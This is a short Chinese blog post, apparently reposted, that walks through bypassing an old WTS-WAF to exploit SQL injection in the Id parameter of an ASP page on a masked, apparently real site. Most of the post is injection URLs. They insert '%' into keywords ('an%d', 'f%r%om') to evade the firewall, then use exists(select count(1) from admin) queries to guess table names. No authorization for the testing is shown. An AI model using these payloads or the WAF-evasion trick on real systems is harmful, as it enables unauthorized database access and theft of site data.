起因
挖漏洞的时候总是会遇到WAF
,绕过记录
漏洞点
***view.asp?big=75&Id=1
漏洞点在Id
参数
添加单引号报错
来一波老套的Id=1 and 1=1
,出现防火墙
***view.asp?big=75&Id=1%20and%201=1
bypass
老版本WTS-WAF
绕过很简单,在关键字里面加%
符号即可
***view.asp?big=75&Id=1%20an%d%201=1
成功绕过
猜表
猜表名,这个地方使用burpsuite
暴力跑就行,也可以手动测一些比较常规的表名,例如admin
***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20admin)
说明存在admin
表,为了证明语句没错,再测一下manager
表
***view.asp?big=75&Id=1%20an%d%20exists(select%20count(1)%20f%r%om%20manager)
说明注入语句没错,manager
表不存在
点到为止
参考链接
- https://blog.csdn.net/u011781521/article/details/53942183
- https://zhuanlan.zhihu.com/p/27730232
- https://www.jianshu.com/p/b2da19279f1f
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。